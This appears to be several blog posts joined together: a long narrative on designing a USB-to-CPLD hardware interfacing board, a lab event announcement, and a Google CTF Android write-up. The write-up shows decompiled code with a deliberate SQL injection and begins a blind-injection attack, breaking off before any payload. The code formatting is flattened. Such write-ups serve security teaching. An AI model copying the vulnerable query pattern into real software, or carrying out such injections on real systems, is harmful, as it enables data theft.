Three tinkerers took those words as they are. Overthrown by the complexity
implied by the multiplicity of inefficient tools, they thought that time had
come to undertake this problem from another angle.

All they needed was a simple way to manipulate the exotic devices that they
required for their projects.
Manufactured by foreign organizations, devices referred here were designed to
fulfill a predefined purpose and were intended to be used as black boxes.
Without any knowledge of the internal mechanisms involved in their operations,
it was conceivable to integrate them if they were in the kind of environment
that they were promised to.

But those tinkerers though differently. Their situation was mostly complicated
by the fact that they had already acquired a good control of their personal
computers that they considered as their main and perfect workstation. Well
defined and roughly understood, they were too stubborn to learn another way
to work as they unanimously decided that this method was the most effective and
compliant with the rest of their work.

So instead of reworking there methodology, they agreed that defining a third
device whose only purpose was to handle the interfacing between the workstation
and the device under test were inescapable. The first member of the group asked
to others what options were available to fit this position.

The second one said that he already made an intensive usage of the Arduino for
that. Providing an easy access and control of its GPIO and some hardwired bus
controllers, it was suitable for the most simple cases.

The third one discussed the merits of the
Bus Pirate from Dangerous
Prototype. Mature and widely-used, this tool provided a direct control of its
interface via USB without the need to develop a specific firmware to be
actually used.

The first one replied to these proposals that they had a common issue: they
simply performed the communication with the host by using an interface based on
the translation of USB to UART speeded at 115200 bauds. For him, it prohibited
a fine-grained configuration and then limited the full capacities provided by
the USB protocol.

They all agreed on this last point and started to work on a first prototype of
their response to this situation.

It was based on a
STM32F072
microcontroller and mapped SPI, I2C, UART and CAN signals to physical headers.
As this chip was able to drive USB signals, a USB mini-connector was directly
connected to it.

Concerning the software side, one interesting idea here was to expose the
hardware interfaces using the corresponding subsystem in the Linux kernel. Even
though these subsystems were mostly used to describe on-chip interfaces,
adapting them to wrap up the USB functions was feasible. For instance, the SPI
exposed by the device could be manipulated as a regular
spidev.

Although the concept of such board was appealing at the time, limitations
quickly appeared. First of all, most of the USB protocol had to be implemented
via software on the STM32F072 which led to a significant overhead on each USB
transaction. Secondly, fully implementing the host driver in kernel space
implied a rigid configuration and error-prone if not implemented correctly.
Finally, the global stability of the STM32F072 MCU was quite poor especially
during a development phase where on-chip debugging had to be frequently used.

One year passed and no one was actually enthusiastic to use this dead-born
project in a real context. The first one, whose credibility was at its lower
point, got the bravery to propose to the two others to rethink the project
from the beginning. And they accepted, against all odds.

This write-up must be considered as the collection of thoughts
that led them to the design and the manufacture of a second version of this
small, unpretentious, and unfinished electronic board.

Chapter I: Forging the One Device

The first step for them was to clearly define how and what could make the
second version of the board better than the previous one. The main issue was
related to the lack of flexibility of the design and they wondered how
they could handle a protocol not supported by the microcontroller they used.

Then they decided to take a look at the wide range of Programmable Logic
Devices available nowadays. As a first prototype, a CPLD appeared to be the
best choice for such application. Compared to a regular FPGA, these
non-volatile PLD were cheaper and required a much more simpler configuration
circuit. They also thought that the prototype was designed to only prove a
concept and moving to a more powerful FPGA for next versions was conceivable.

Section I: From Ink...

From a high-level point of view, the board had been specified to expose a
reasonable number of IOs directly connected to a controller, here an
Altera Max V CPLD.
As the flaky soft USB implementation of the previous version was
quite inconvenient to maintain and to keep reliable, the job here had been
assigned to a well-known and solid dedicated USB controller: the
FX2LP from
Cypress Semiconductor. This highly integrated USB 2.0 microcontroller
implemented most of the protocol logic in silicon and only burdened its integrated
8051's firmware with the high-level configuration aspect of USB.

And then came the question about the communication between the USB controller
and the IO controller. The FX2LP embedded a powerful mechanism to forward the
content of a USB entrypoint to an hardware FIFO without any interaction with
the internal 8051. These EP buffer's words could then be dequeued by an external
component using an hardware interface.

However, this one was defined by a 16-bit data bus and 6 control signals which
was quite pin-consuming for the CPLD they chose. Fortunately, another
mechanisms offered by the FX2LP allowed the programming of a custom protocol
to transmit and receive these data with the external world: the General Programmable
Interface. As for the regular FIFO interface, this hardware unit was almost
completely independent from the 8051. The firmware was only responsible to
program the hardware state-machines used to represent the waveforms of a
one-word transmission.

In their case, they chose to allocate 8 wires for the bidirectional data bus,
3 control signals driven by the USB controller and 2 'ready' signals
initiated by the IO controller. At that point, none of them had actually thought
about the exact shape of the waveforms and the purpose of the control signals
but planned to consider that once the first board would be fully manufactured.

The USB device interface was composed of 3 endpoints. The endpoint 0 acted as a
regular control endpoint and was used to transfer small requests. Meanwhile,
endpoints 2 and 6 were dedicated to bulk transmissions and receptions
respectively. The two last were directly connected to the internal FIFO while
the first one was completely handled by the 8051.

To power these components, the 5V supplied by the USB were firstly shifted to
3.3V using a low-dropout voltage regulator to power the USB controller and the
IO banks of the CPLD while a 1.8V regulator powered the CPLD's internal logic.

The main clock was managed by the FX2LP. Connected to a 24MHz crystal, the
internal PLL were configured by the 8051 firmware allowing a CPU clock
frequency of 48MHz, 24MHz or 12MHz. As the output of the phase-locked loop was
also exposed outside the USB controller by the CLKOUT pin, the CPLD used it as
a system clock.

The GPIF unit had a dedicated clock that could be fed internally or imposed by
an external device. All operations on this interface were aligned to this
signal. In order to avoid to deal with multiple clock domains in the CPLD, they
arranged to drive the IFCLK signal from the IO controller at the half frequency
of the system clock.

An I2C EEPROM had been connected to USB controller in order to store
its firmware in a persistent way. The internal reset logic of the FX2LP was
designed to scan the I2C bus for EEPROM from where a valid firmware could be
loaded. Once the program was fully copied to internal RAM, no operations were
performed on this bus.

After several tries, they finally validated the following schematic:

Section II: ...To Copper

Once the design approved, the next step consisted to draw the printed circuit
board. Two layers were enough to route the entire netlist in a surface of
5x5cm.

The top layer was dedicated to voltage regulation, CPLD, connectors and
a couple of switches and LEDs.
Meanwhile, the bottom one contained the whole circuit required to
make the USB controller working: crystal, EEPROM, I2C pull-up resistors, ...

As the board was manually soldered, it was not conceivable for them to use BGA
components for this prototype. So the 100-pin LQFP version of the CPLD had been
used as well as the 56-pin SSOP package of the Cypress's chip.

After hours of painful electrical tests, a first sample of a fully soldered
board was born by the end of the Spring:

Chapter II: On Reprogrammability They Hoped

Although the physical board was ready, a firmware was still needed to make it
working. The situation was more complex than just a simple binary located in a
single ROM as most of the boards of this category are.

First of all, the firmware for the FX2LP had been implemented which basically
consisted to configure the USB and the GPIF units of the chip. Nothing uncommon
here: writing applications for this kind of microcontroller was quite easy as
it was well-documented and that tons of similar usages of this chip already
existed and were publicly available. The code has been written in a couple of
hours and no new features have been added since as they decided to make the
firmware serving only one unique purpose: translate USB data to IO controller
in the most simple and lightweight way.

For them, most of the customizations that would be needed should be
fully-implemented at the IO controller level. The real challenge here was to
take advantage of the CPLD as a powerful and programmable IO controller.

One solution would be to base the CPLD's design on a soft-processor: modifying
IO's behaviour would mean loading a new firmware into its RAM. Although this
architecture was quite common when using an FPGA, it became more inconvenient
when basing it on a CPLD due to the lack of memory blocks.

The second solution would be to generate and configure the design of the CPLD
according to the user's needs dynamically. As pursuing this concept using a
regular hardware description language seemed almost impossible for them, they
decided to fully base the design generation on
Migen. This python module allowed the
meta-programming of synchronous register transfer level design and handled the
generation of a verilog file that could then be synthesised by the regular
Altera's toolchain.

Section I: Modularity And Modulation

They fully defined the architecture around the concept of modularity. To
demonstrate how it would transpire in a real context, they took the example of
a Pulse-Width Modulation interface.

The main principal of such technique was to use a rectangular pulse wave whose
pulse width was modulated resulting in the variation of the average value of
the waveform.

A possible implementation of a PWM module could be achieved by using a counter
whose width defined the period of the signal and a digital comparator to
generate the needed duty cycle.

In this case, the only signal that was likely exposed externally
would be the output of the comparator, negated or not. Moreover, a 'parameter'
of this circuit would be the left-input of the comparator and was typically the
kind of signal that would be interesting to implement as a register writable
from the host.

For their example, they also considered that the counter value could
be watched from the host.

The 'parameter' signals were called 'Control Registers' and were intended to be
readable and/or writable from the host while the signals that would be eligible
to be mapped to a physical pin of the CPLD were called 'IO Signals'.

In a more generic way, this kind of module, that they called 'IO Module', could
always be represented according to the following template:

An internal logic block that could contain both combinational and sequential
logic left to IO Module's discretion.

'Control Registers' connected to an internal bus and used to watch and
control the activity of the internal logic from the host.

'IO Signals' intended to interact with an external component and to be
mapped to real pin.

Imposing such kind of interface also meant imposing a huge, redundant and
overblown part of HDL code only to ensure the glue logic between the core logic
of the module and the rest of the design. This was where meta-programming
became appropriated.

A python module called bmii had been developed to extend the structures
provided by Migen. For instance, an extension of the
'Module' objects was
included in this library to add all facilities needed to generate the
intended glue logic.

1
2
3

frombmiiimport*iom=IOModule("pwm")

This object contained the cregs special attribute which was used to manage
the control registers of the IOModule. CtrlReg was charged to construct a
special 8-bit width Migen's
Signal which
embedded extra information needed to build the control registers network.
The direction of such register had to be manually specified during
instantiation. It could be:

RDONLY: Only readable from the host. The signal had to be driven by the
internal logic of the IOModule.

WRONLY: The signal could only be latched from the host but could not read
it back. This direction was useful to suggest the toolchain to synthesise
this signal as a wire instead of a verilog's reg.

RDWR: The signal could be read and written from the host. Synthesis of this
kind of signal would likely result to verilog's reg.

For the PWM IOModule, only the pulse's WIDTH and the COUNTER signals had
to be accessed from the host.

In the same way, iosignals attribute handled the signals intended to be
mapped to physical pins. An IOSignal always correspond to a 1-bit width
signal. The direction of an IOSignal was also needed to be explicitly
specified.

OUT: Signal driven by the IOModule.

IN: Signal driven by an external component and read by the IOModule's
logic.

DIRCTL: Signal driven by the IOModule and used to control the tri-state
buffer of a pin.

Section II: An Iron Hand In A Velvet Glove

The concept of control register was illustrated and justified. Their aim was
then to think about how to make them accessible from the host by using USB.

Concretely, this step meant defining a unit that would be able to translate
GPIF waveforms to a more convenient protocol to drive the internal bus.
This unit had been called 'Northbridge'.

The internal bus had been defined as follow:

MOSI[0:7] and MISO[0:7] represented the both directions of the data bus.

WR distinguished a read or a write operation.

MADDR[0:2] and RADDR[0:4] were used to generate the chip select signal
for a module and a control register respectively.

REQ informed the control register that an operation was going to
be performed.

The issue here was related to the fact that the GPIF data bus had exactly the
same width that a control register. This meant that the addressing and the
read/write operations on the internal bus could not be achieved in a
single clock tick.

From the GPIF point of view, performing an operation on the internal bus meant
sending the module/control register address (latched by the Northbridge) before
proceeding to the actual read/write operation.

The northbridge managed the GPIF's control signals as follow:

CTL0 and CTL1 were basically forwarded to the REQ and WR signals of
internal bus respectively.

CTL2 was used to indicate that the USB controller was latching an address
and that the current operation must not be considered as a regular write
operation.

The northbridge was polling for operation by checking the value of the CTL0
signal when clocking the interface clock.

In addition of containing a value, control registers were generated with extra
signals used to represent the operation currently performed on it and then
facilitated their usage from the internal logic.

The wr and rd signals indicated that the control register was selected
and that a write or read operation respectively was going to be performed.
These signals were asserted during several clock ticks as they were directly
forwarded by the northbridge from the GPIF. So to facilitate the use of them in
a synchronous circuit, wr_pulse and rd_pulse were derived from the previous
signals. By using a 'level to pulse' state machine, wr_pulse were implemented
to be asserted during exactly one clock tick when the write operation was
completed and then indicated to the internal logic that a valid value was
available in the register. In a meantime, rd_pulse pulsed the beginning of
the read operation to inform the IOModule that the control register was going
to be read and then gave it time to feed a correct value before the next
falling edge of rd signal, moment when its value was actually captured by the
northbridge.

At that point, any control register could be accessed from the host using the
correct USB request. In order to make the usage of the USB easier from the host
point of view, an additional interface had been introduced: the BMIIModule.

A python object of this type contained two special attributes: the first one
was the IOModule which represented the RTL design while the
second was called the driver of the BMIIModule. Automatically created,
the drv attribute was able to inspect the IOModule to generate the correct
USB request according to the information specified in the RTL about the
control registers addresses and directions.

1

pwm=BMIIModule(iom)

To finalize the generation of the IO controller design, the BMII object acted
as a top-level representation of the whole design of the board. It must be
informed that a new module had to be added by using its add_module method.

A call to this procedure meant connecting the IOModule to the internal bus,
allocating module and control registers addresses.

1
2

b=BMII()b.add_module(pwm)

Once the CPLD configured, the host could easily accessed the control registers
by simply setting the attributes of the drv aliased with the control
registers names:

1
2

pwm.drv.WIDTH=42cnt=int(pwm.drv.COUNTER)

Section III: The Signal Goes South

In the same way the northbridge managed the communication with the external
USB controller, a other dedicated unit had been defined to handle the
multiplexing of the IOSignals to physical IO pins. Obviously called the
southbridge, it was implemented as a special IOModule which had no
IOSignals and was only charged to manage the signals coming from other
modules. For each physical pin, the southbridge was charged to generate the
following circuit:

Each pin was considered bidirectional and the direction could be configured
with an IOSignal defined as such. An unlimited number of signals could read
the value of a pin while only one could drive it.

To inform the southbridge that an IOSignal had to be connected to a pin,
assignment to pins attribute of this unit had to be performed
as follow:

1

b.ioctl.sb.pins.LED0+=pwm.iomodule.iosignals.OUT

The direction declared during the definition of the IOSignal were used to
determine where the signal had to be connected on the pin multiplexing circuit.

As the southbridge was considered as a regular IOModule, it was connected to
the internal bus and then exposed its own control registers.
This opportunity was leveraged to make the pins controllable from host
bypassing the need of defining a specific IOModule when a simple operation
had to be performed on the IOs.

PINDIR, PINDIRMUX, PINOUT, PINMUX and PINSCAN signals of each pin
were accessible using southbridge's control registers. For instance, making the
LED blinked could be commanded by:

The northbridge used two control registers defined for testing purposes only.
The IDCODE contained a magic number read by the USB controller to verify the
validity of the CPLD's configuration while the SCRATCH register was used to
test write operations on the bus.

To sum up, the following architecture had been defined as the basis for further
improvements:

Section IV: An Autarchical Sequence

As this architecture was mainly based on the flexibility provided by the CPLD,
one issue still remained before becoming truly usable: the compiling and
programming sequences of a BMII's design had to stay self-contained and to avoid
the need of external hardware tools.

The building sequence aimed to produce the binary blob of the USB firmware as
well as the bitstream of the IO controller. For the FX2LP, a ninja build file
was generated to proceed to the compiling of the custom firmware using
sdcc.

Concerning the IO controller, the verilog generation was left to Migen while
the building of the bitstream was ensured by Quartus.

1

b.build_all()

The programming sequence was a bit more tricky. A first and trivial way to
achieve this was to use a
USB Blaster
JTAG probe to configure the CPLD with the desired bitstream. In order to be
self-programmed, the CPLD's JTAG signals had been connected to a tri-state
buffer in addition to the regular 10-pin JTAG header. Ensured by a standard
74244, this buffer was driven by the USB controller. The goal of this circuit
was to give the ability to communicate with the CPLD via JTAG when the JTAGE
was asserted.

To be able to reuse Quartus Programmer software to program the CPLD, the
open-source implementation of the USB Blaster protocol for FX2LP
(ixo.de USB JTAG) had been adapted to match
the wiring of their circuit.

1

b.program_all()

The programming sequence could be summarize as follow:

The first step was to load the custom USB Blaster firmware into the USB
controller using fxload.

If a JTAG IDCODE scan was successful, the bitstream was uploaded using
Quartus Programmer.

To be able to write their own FX2LP firmware to the EEPROM, a second stage
firmware loader was programmed in the chip. It added a new USB vendor command
allowing writing operations on the I2C bus.

Finally, the regular firmware was loaded in the USB controller.

Chapter III: The Fellowship Of The Joint Test

As a first application of there board, the second tinkerer proposed to
implement a full-featured JTAG probe that anyone could use as an alternative to
Flyswatter,
Bus Blaster or any other
cheap JTAG probe.

The JTAG defines an electrical standard for on-chip instrumentation by using a
dedicated debug port implementing a serial communication interface. This
protocol was well-defined and simple enough to be used as a comprehensive
example.

The third one replied that demonstrating the usefulness of their project by
trying to mimic other well-known and mature JTAG probes was a waste of time
since reaching comparable performance would required more effort that he
could imagine at the time.

The first tinkerer mitigated that argument by pointing the fact that no cheap
JTAG probe was generic enough to be compatible with a very wide range of platforms
and very few of them were designed to be used in contexts other than just CPU's
on-chip debugging. He agreed and started to think about a possible
implementation of such protocol using their project.

Section I: The Bridge Of Shockley

Even though the JTAG standard was quite strict about the communication logic,
the electrical characteristics of the signals were left to the target device.
This meant that the probe had the responsibility to drive them with the target
voltage.

Assuming that the main board was only able to drive 3.3V IOs, expanding it with
the needed interface was required.

A first version had been implemented using voltage level shifters and worked
well with some mainstream devices. However, some platforms from specific
manufacturers pull-up JTAG signals with very low resistors, which forced the
probe to drive more current than most of the voltage level shifters could
supply.

As a quick fix, the expansion board had been equipped with bipolar junction
transistors for output signals.

In a more generic way, they though that being forced to design expansion board
to electrically convert signals from the main board to the driven target was
not a big deal. Main board's IO could simply not be electrically universal.

Section II: The Self-Surgery

For a naive implementation of JTAG protocol, the IOModule consisted of simply
connecting the TMS and TDI outputs to a write-only control register while
wiring the TCK to its wr_pulse signal. In this configuration, each JTAG
clock tick was triggered by writing to this control register.

Each devices on a JTAG's daisy chain communicated via a Test Access Port.
This hardware unit implemented a stateful protocol to expose its debug
facilities. As it was possible to make all of them converged to a reset and
stable state, it was easy to walk though this state machine by keeping all TAPs
synchronized.

Assuming this, a unique state machine was implemented in the IOModule to
keep the track of the current TAP state. A control register had been allocated
to allow the host to check this state when needed.

Devices responded to JTAG scans with the TDO signal. The FIFO block was
used to buffer received data before being read by the host thought a read-only
register. This case perfectly demonstrated the usage of the rd_pulse signal
since it was used to dequeue the next value of the FIFO submodule.

Although most platforms's JTAG daisy chain were short and fixed, some of them
could dynamically append TAP to the chain, making the usage of general purpose
JTAG tools unusable. To describe this kind of situation, facilities had been
implemented to describe a dynamic TAP network.

1

frombmii.modules.jtagimportJTAG,TAP,DR

A JTAG object extended a regular BMIIModule to abstract the low-level
operations to the JTAG's IOModule.

TAP and DR were provided to describe the current layout of the TAP network.
For instance, describing the Max V's JTAG would look like this:

A possible improvement for this would be to generate this tap network
directly from the BSDL files of daisy chained devices. The usage of BJT to
drive JTAG signals was also a very quick and easy response to the low
pull-up resistance problem. The third tinkerer complained that many other
solutions could be implemented there as the BJT had a very long switching time
and then forced to drive signals at 12MHz when many targets supported to be
clocked up to 100MHz in their debug port.

Chapter IV: And In Darkness Bind Them

Sceptical about the results of the first application, the third tinkerer
thought about a niche application that only few people would actually need.
Enthusiastic but upset by the pragmatism of the two other, he left the group to
develop his idea by his own.

For him, a second purpose for this board was purely and simply to act as a
test bench for analysing black-boxed devices. To demonstrate his idea, he chose
the first device he could found on his drawer: a Z80 packaged in a DIP-40.

Primary sold by Zilog as an improved Intel 8080, it had become a very popular
processor for simple embedded applications since it was truly easy to make this
chip working with a custom circuit. This device was then the perfect guinea
pig for his experiences.

Section I: The Calm Before The Storm

Before trying to blow up the chip, defining the RTL needed to
correctly drive the CPU was necessary.

1

iom=IOModule("Z80TB")

The DIP-40 version of this CPU exposed a 16-bit address bus and a 8-bit data
bus. As the last one was bidirectional, three different IOSignals had to be
defined: DIN, DOUT and DDIR. In order to keep the main board and the
device under test synchronized, the CPU's clock was managed by the IOModule.
All other required control signals were defined as IOSignals.

The clock signal of the Z80 had been fixed to half the frequency of the
system clock. Due to clocking requirement of the chip, this signal was fixed to
8MHz.

1

iom.sync+=iom.iosignals.CLK.eq(~iom.iosignals.CLK)

Requests from the Z80 CPU followed 3 stages. When it was not halted, the
testbench entered an IDLE state. During this one, the CPU was still
performing operations internally but did not request any external resources.

The second stage followed a request detection. The goal here was to freeze the
CPU execution until the host provided an instruction to the testbench about how
to handle the request.

Finally, the last stage meant actually responding to CPU's request according to
host instructions.

While waiting for an answer from the host, the trick here was to assert the
_WAIT input of the CPU in order to notify it that bus cycle could not be
completed at that moment. This left enough time for the host to communicate its
desired operation. To finalize a write operation, the host just had to read
from the WRITE register. Completed a read operation was performed by
writing to READ control register.

Chapter V: The Feebleness Appears

In a meantime, the two other tinkerers were focussed on testing the
main board on some more pragmatic scenarios in order to check its limitations
with the hope to serve a real purpose.

Section I: The Relativity of Space...

Their experience with the implementation of a JTAG module were marked by the
difficulty to debug and trace the state of the digital design. As the
northbridge and the internal bus logic were considered reliable enough, they
decided to implement an IOModule exclusively designed to probe any other
signals of the IO controller design.

Acting as an internal logic analyser, a probing circuit composed of one control
register fed by a FIFO was generated for each probed signals.

The capture was triggered by a special configurable signal and could be reset
by the host at any moment.

As an example, the following design made the main board to act as a very cheap
logic analyzer where all IO signals were simultaneously probed. The trigger was
wired to the physical switch input:

The SPI module initiated a transaction when its TX register was written. Its
wr_pulse was then used to define the trigger of the logic analyzer as the
goal was to analyse the output signal during an SPI activity.

The capture method of a logic analyzer object waited for a capture be
completed and then dequeued the samples by reading the control register of each
probe.

Finally, the show method could be used to generate the captured waveforms to
a VCD file and to display it using gtkwave:

However, each probe circuit was significantly logicblock-consuming which
limited the use of tiny FIFO making the logic analyser useless on complex
circuit.

Section II: ...And Time

After this first disappointment related to the quite limited space provided by
the CPLD, they pursue their work on the SPI module by implementing required
operations to drive a JEDEC-compliant serial flash memory.

Driving the SPI flash was actually quite easy when it was previously extracted
from its original circuit. This one was desoldered from a PC motherboard:

1
2
3

sf.dump(0x1FE000,size=25)b'Award BootBlock BIOS v1.0'

The real challenge could be to probe the SPI packet in a passive way. This
implied to base the IOModule logic on the SPI clock imposed by an external
device instead of the regular system clock. Even though all this logic had been
implemented and tested on simple devices, it was still returning malformed data
when used on a PC motherboard since the BIOS flash was clocked at a frequency
higher than 40MHz.

Their guess for the reason of this issue was based on the fact that no IO pins
were connected to a clock input of the CPLD. This meant that the SPI clock was
gated by a regular IO input not designed to support such high frequency.

Chapter VI: Displayed As Of Yore

Affected by these previous failures, the two first tinkerers doubted about the
real efficiency of the current hardware design of their board. By curiosity and
driven by their discouragement, they look for the third one, probably lost in
his solo projects.

They found him in its basement, soldering wires and axial resistors to a VGA
connector. He explained that he was oddly trying to make the main board acting
as a video card. That was a plain useless job but he was glad to do it. Bored,
the two other tried to helped him to finish and agreed that it would be their
last experience with their board.

Section I: The Dilemma Of Etching Copper

Although driving VGA signals was something quite simple, they estimated that
creating a dedicated expansion board would make their job easier. Firstly, it
would allow the mechanical integration of a decent VGA connector. Secondly,
it was a good opportunity to add some extra memories to the board as the CPLD
would not be able to store enough data needed to implement a video card.
A standard 128KB static RAM packaged in a SSOP package has been chosen due to
to its simple interface and its fast respond time.

The VGA's RGB pins must be driven by analog signals which implied the use of
Digital to Analog Converters to be controlled from the CPLD. As these signals
were defined to be ground terminated by a 75 Ohm resistor on the monitor side,
a cheap equivalent of a DAC could be obtained by connecting different resistors
to several CPLD's outputs, connected in parallel and acting as a voltage
divider with monitor's termination resistor (see R1 to R6).

By allocating 6 outputs for driving RGB signals, 64 colors could be generated.
However, the limited number of IO pins prevented the usage of all of the 17-pin
SRAM's address bus in the same time that the 6 pins of the RGB signals.

In order to postpone this design decision, jumpers had been added to the
extension PCB to allow the configuration at soldering-time. The first setting
allowed the usage of 8 colors with a 256KB video RAM while the second one
constrained the use of a 16KB RAM but could drive 64 colors (see table at the
bottom layer of the PCB).

Section II: A Proselytized Static Memory

On a regular video card, framebuffer was supposed to be stored on a dual-port RAM
in order to allow the controller to write displayed frame in the same time
that it was read by the signal generator. As this kind of device must be
controlled by a large number of pin, a regular SRAM had been used to substitute
a real VRAM.

Of course, this tweak forced a tighter management of the VRAM as two
independents actors were using it at the same time while providing a unique
interface.

From a high-level point of view the simple video card could be represented as an
IOModule by following this architecture:

To manage the VRAM, the trick was to exploit the fact that the pixel clock
required to display with a resolution of 640x480 at 60Hz was fixed to 25.175
MHz. As the IO controller was clocked at 48MHz, odd ticks were used to read
from VRAM and to drive the pixel clock at 24Mhz which was acceptable for most of
the recent VGA monitors. Meanwhile, even ticks where used to perform the write
operations on the VRAM. To ensure that writing operations were successful, the
read operation that followed a writing was cancelled which was
not critical most of the time but could led to small display glitches

The VRAM management unit could be described with the following state-machine:

1: If a write operation has to be performed, then, drive the data and the
address bus. Else, drive the address bus for the next reading.

2: Reading state: Capture the output of the VRAM

3: Writing state: Indicate to the VRAM that the data bus is ready to be read
for a memory writing.

Section III: Words Engraved In A Black Screen

As the VRAM management core logic and the VGA signal generation was correctly
working, only the logic needed to drive the read from the VRAM and to drive RGB
signals according to VRAM's data had to be adapted to modify the displaying.

To demonstrate how the VRAM could be managed, a simple text mode had been
implemented.

VRAM had been organized as follow:
- 0x0000 - Text framebuffer: as the VGA-compatible text mode implemented on PC
platforms, each characters consisted of one byte for the ASCII code and a
second contained the color.
- 0x0700 - Character set (3KB): Sprites representing each character. A font
similar to the IBM's code page 437 was used.

As only one reading on the VRAM was possible per pixel clock tick, reading
sequence had to be aligned to the character display. While the three last
pixels of a character, the VRAM reading logic fetched the ASCII code and the
color of the next character on the framebuffer and provided to the display
logic the corresponding sprite's row from the character set.

Epilogue

Surprisingly, the two first tinkerers found unexpected satisfaction to complete
this dumb video card. The result of this last experience reflected the childish
feelings that pushed them to start their first board: a satisfying design
serving a useless objective.

This forced step-back helped them to highlight the items that could improve the
next version of the board, if someone would be brave enough to go on on their
footsteps. The lack of logic blocks could be easily solved by switching to an
FPGA. A lot of decent ones were still available in 144-pin EQFP packages.
Allocating pins to an external RAM would also not be a waste. Many other
applications were blocked by the lack of an embedded and easy to use memory.

Concerning the timing issues encountered while probing the SPI flash, simply
mapping some clock inputs to physical headers would be enough to unscramble
most of them.

After that, the tinkerers team split up. Each of them had been aligned to the
'state-of-art'-ish folk and they finally scattered, where engineers dwell...

For the sixth year, we are organising the LSE Summer Week mid-July to show the
work we are doing here at the LSE, about various themes we like, have
encountered or overall judge interesting.

The exact planning and subjects addressed will be announced later, as well as
the exact timetable. As we did last year, we are also opening the talks to
external contributors and all LSE members, present or past.

The presentations will be held in French as usual and we will try to record
everything.

Let's extract the apk and decompile it in order to see what is inside. For
this, I like to use 2 different tools, as they are not giving us the same
output (and I am lazy, and don't know how to do it with only one tool).

First, dex2jar takes an apk, and turns it to a jar. We can then read the code
with jd-gui.

1
2

$ dex2jar illintentions.apk
$ jd-gui illintentions.apk

The other tool is apktool that gives us all the manifests and metadata
correctly reversed and lisible.

What can we see here? There is some native libraries for multiple architecture,
some resources, and the code for a simple application.

Let's try to see what we can find in the java code:

We have 6 classes in this apk:

MainActivity: probably the entry point

Send_to_Activity

IsThisTheRealOne

DefinitelyNotThisOne

ThisIsTheRealOne

Utilities

Here is the main activity:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

packagecom.example.application;importandroid.app.Activity;importandroid.content.IntentFilter;importandroid.os.Bundle;importandroid.widget.TextView;publicclassMainActivityextendsActivity{publicvoidonCreate(BundleparamBundle){super.onCreate(paramBundle);paramBundle=newTextView(getApplicationContext());paramBundle.setText("Select the activity you wish to interact with.To-Do: Add buttons to select activity, for now use Send_to_Activity");setContentView(paramBundle);paramBundle=newIntentFilter();paramBundle.addAction("com.ctf.INCOMING_INTENT");registerReceiver(newSend_to_Activity(),paramBundle,"ctf.permission._MSG",null);}}

The application registers a handler to a broadcast intent named
"com.ctf.INCOMING_INTENT" and uses Send_To_Activity as a BroadcastReceiver.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

publicvoidonReceive(ContextparamContext,IntentparamIntent){paramIntent=paramIntent.getStringExtra("msg");if(paramIntent.equalsIgnoreCase("ThisIsTheRealOne")){paramContext.startActivity(newIntent(paramContext,ThisIsTheRealOne.class));return;}if(paramIntent.equalsIgnoreCase("IsThisTheRealOne")){paramContext.startActivity(newIntent(paramContext,IsThisTheRealOne.class));return;}if(paramIntent.equalsIgnoreCase("DefinitelyNotThisOne")){paramContext.startActivity(newIntent(paramContext,DefinitelyNotThisOne.class));return;}Toast.makeText(paramContext,"Which Activity do you wish to interact with?",1).show();}

What we can see in it is that it takes a string parameter "msg" that is
calling one of the activies in the apk, depending on this value. Let's try to
trigger one of them, and look at what it does.

We have 3 choices:

ThisIsTheRealOne

IsThisTheRealOne

DefinitelyNotThisOne

let's assume we can ignore DefinitelyNotThisOne and try ThisIsTheRealOne.

Ok, so we have a button that sends an intent with 3 parameters when clicked.
Some of the parameters comes from the resources stored in the apk, for that, we
have 2 xml files from the apktool extraction:

Interlude: Can you repo it?

Can you repo it?

5 points

Do you think the developer of Ill Intentions knows how to set up public repositories?

Really nothing much to say here, we grabbed the git username of the developper
of Ill Intentions in res/values/strings.xml, "l33tdev42", looked him up on
github, cloned the only repository available, and took a look at the git
history, and the last commit is this one:

Do we really need to say more? That was fun, and this is something I really
liked in all this ctf, most of (if not all) the challenges was nearly real case
scenarios! This is really interesting to have something like that in a ctf,
congrats google!

Back to the challenge

Back to our intents! orThat() is a native method contained inside the library
hello-jni.so. Let's take a look at it.

publicclassLoginReceiverextendsBroadcastReceiver{publicvoidonReceive(ContextparamContext,IntentparamIntent){ObjectlocalObject=paramIntent.getStringExtra("username");paramIntent=paramIntent.getStringExtra("password");Log.d("Received",(String)localObject+":"+paramIntent);paramIntent=newLocalDatabaseHelper(paramContext).checkLogin((String)localObject,paramIntent);localObject=newIntent();((Intent)localObject).setAction("com.bobbytables.ctf.myapplication_OUTPUTINTENT");((Intent)localObject).putExtra("msg",paramIntent);paramContext.sendBroadcast((Intent)localObject);}}publicStringcheckLogin(StringparamString1,StringparamString2){SQLiteDatabaselocalSQLiteDatabase=getReadableDatabase();CursorlocalCursor=localSQLiteDatabase.rawQuery("select password,salt from users where username = \""+paramString1+"\"",null);Log.d("Username",paramString1);if((localCursor!=null)&&(localCursor.getCount()>0)){localCursor.moveToFirst();paramString1=localCursor.getString(0);Stringstr=localCursor.getString(1);localCursor.close();localSQLiteDatabase.close();if(Utils.calcHash(paramString2+str).equals(paramString1)){Log.d("Result","Logged in");return"Logged in";}Log.d("Result","Incorrect password");return"Incorrect password";}if(localCursor!=null)localCursor.close();localSQLiteDatabase.close();Log.d("Result","User does not exist");return"User does not exist";}publicvoidonCreate(SQLiteDatabaseparamSQLiteDatabase){paramSQLiteDatabase.execSQL("CREATE TABLE users (_id INTEGER PRIMARY KEY,username TEXT,password TEXT,flag TEXT,salt TEXT)");}publiclonginsert(StringparamString1,StringparamString2){inti=newRandom().nextInt(31337);paramString2=Utils.calcHash(paramString2+newInteger(i).toString());SQLiteDatabaselocalSQLiteDatabase=getWritableDatabase();ContentValueslocalContentValues=newContentValues();localContentValues.put("username",paramString1);localContentValues.put("password",paramString2);localContentValues.put("flag","ctf{An injection is all you need to get this flag - "+paramString2+"}");localContentValues.put("salt",newInteger(i).toString());longl=localSQLiteDatabase.insert("users",null,localContentValues);localSQLiteDatabase.close();returnl;}

As we can see, there is a simple sql injection in the checkLogin method. In
the code we can see that if the query is returning no result, we have "User
does not exist" as a parameter in an intent
"com.bobbytables.ctf.myapplication_OUTPUTINTENT", and "Incorrect password"
if the query returns a result.

Ok, so let's try to exploit this in blind!

First we need to have a request that can return a result or not. As we can see,
the salt will always be under 31337, we can use that to always have some kind
of result. Let's inject as a username:

The LSE-PC aims to be a compact IBM-PC compatible development board based on an
